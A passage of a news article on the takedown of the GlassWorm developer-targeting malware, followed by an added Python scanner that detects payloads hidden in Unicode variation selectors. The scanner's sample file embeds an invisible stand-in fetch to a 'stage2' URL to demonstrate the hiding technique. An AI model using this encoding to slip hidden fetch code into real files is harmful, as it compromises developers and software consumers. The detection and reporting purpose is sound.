By taking down all four channels at the same time, the cybersecurity firms severed the operators’ access to the infected machines and their ability to deliver new instructions.

First spotted in October 2025, GlassWorm has relied on Unicode variation selectors to hide its payload: the malicious code is encoded in characters that code editors render as nothing, so a human reviewing the file sees only the legitimate-looking source around it.

The self-propagating malware was initially distributed through trojanized Visual Studio Code extensions published on the OpenVSX marketplace. In November, it also emerged on GitHub.

In 2026, GlassWorm attacks continued to target VS Code developers and other open source software ecosystems. In March, multiple Python projects were compromised.

“The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says.

GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency wallet extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines.

The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers: a stolen npm or GitHub token lets the operators publish malicious versions of otherwise legitimate packages. All consumers of potentially impacted software, including enterprises and other types of organizations, were therefore also exposed to compromise.

According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments.

“This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes.

In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check network logs for connections to this IP address to identify potential infections. A host that beacons to it is still running the implant and should be treated as compromised: rotate the npm, GitHub and Git credentials held on that machine and review anything published from it.

“As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes.
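The variation-selector hiding technique described above can be checked for mechanically. The following is an added example written for this page, not CrowdStrike's tooling or GlassWorm's own code: it scans source text for runs of Unicode variation selectors (U+FE00..U+FE0F and U+E0100..U+E01EF), which have no glyph of their own and so show up as blank in editors, and decodes a run back to bytes under an assumed one-byte-per-selector mapping (VS1..VS16 as 0x00..0x0F, VS17..VS256 as 0x10..0xFF). That mapping, the `min_run` threshold and the embedded sample file are assumptions made for the example; a real sample may use a different scheme, so any long run should be treated as suspicious whether or not it decodes to something readable.

```python
"""Scan source files for payloads hidden in Unicode variation selectors.

Added example for this article; not CrowdStrike or GlassWorm code. The byte
mapping below is an assumption chosen so that the 256 selectors cover one
byte each; real samples may differ, so a long run is suspicious regardless.
"""
import re
import sys
from dataclasses import dataclass

# U+FE00..U+FE0F (VS1..VS16) and U+E0100..U+E01EF (VS17..VS256). They are
# combining characters with no glyph, so an editor renders nothing for them.
VS_RUN = re.compile("[\ufe00-\ufe0f\U000e0100-\U000e01ef]+")

# A single VS16 after an emoji is normal text; a long run never is.
MIN_SUSPICIOUS_RUN = 8


@dataclass
class Finding:
    path: str
    line: int          # 1-based line number
    column: int        # 0-based offset of the run within the line
    length: int        # number of selectors in the run
    decoded: bytes     # bytes recovered under the assumed mapping


def vs_to_byte(cp: int) -> int:
    """Map one variation selector code point to a byte (assumed scheme)."""
    if 0xFE00 <= cp <= 0xFE0F:
        return cp - 0xFE00            # VS1..VS16   -> 0x00..0x0F
    if 0xE0100 <= cp <= 0xE01EF:
        return cp - 0xE0100 + 0x10    # VS17..VS256 -> 0x10..0xFF
    raise ValueError(f"U+{cp:04X} is not a variation selector")


def byte_to_vs(b: int) -> str:
    """Inverse of vs_to_byte; used only to build the constructed sample."""
    return chr(0xFE00 + b) if b < 0x10 else chr(0xE0100 + b - 0x10)


def decode_run(run: str) -> bytes:
    return bytes(vs_to_byte(ord(ch)) for ch in run)


def encode_payload(data: bytes) -> str:
    return "".join(byte_to_vs(b) for b in data)


def scan_text(text: str, path: str = "<memory>",
              min_run: int = MIN_SUSPICIOUS_RUN) -> list[Finding]:
    """Return one Finding per run of at least min_run selectors."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in VS_RUN.finditer(line):
            run = m.group()
            if len(run) >= min_run:
                findings.append(
                    Finding(path, lineno, m.start(), len(run), decode_run(run)))
    return findings


def scan_file(path: str, min_run: int = MIN_SUSPICIOUS_RUN) -> list[Finding]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read(), path, min_run)


# Constructed sample: a harmless-looking extension file with a hidden string
# appended after a comment. Nothing here is a real GlassWorm artifact.
HIDDEN = b"fetch('https://example.invalid/stage2')"   # hypothetical payload
SAMPLE_SOURCE = (
    "const vscode = require('vscode');\n"
    "function activate(ctx) { console.log('ready'); }\n"
    "// build helper " + encode_payload(HIDDEN) + "\n"
    "module.exports = { activate };\n"
)


def report(findings: list[Finding]) -> str:
    lines = []
    for f in findings:
        preview = f.decoded.decode("utf-8", errors="replace")
        lines.append(f"{f.path}:{f.line}:{f.column}: {f.length} hidden "
                     f"variation selectors, decodes to: {preview!r}")
    return "\n".join(lines)


if __name__ == "__main__":
    paths = sys.argv[1:]
    results = (scan_text(SAMPLE_SOURCE, "sample.js") if not paths
               else [f for p in paths for f in scan_file(p)])
    print(report(results) or "no suspicious variation-selector runs found")
    sys.exit(1 if results else 0)
```

Run it with no arguments to see the constructed sample flagged, or pass extension, package or repository files as arguments; a non-zero exit makes it usable as a pre-commit or CI gate. The threshold is deliberately above one so that ordinary emoji text (which uses a single VS16) is not reported.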
Source: SecurityWeek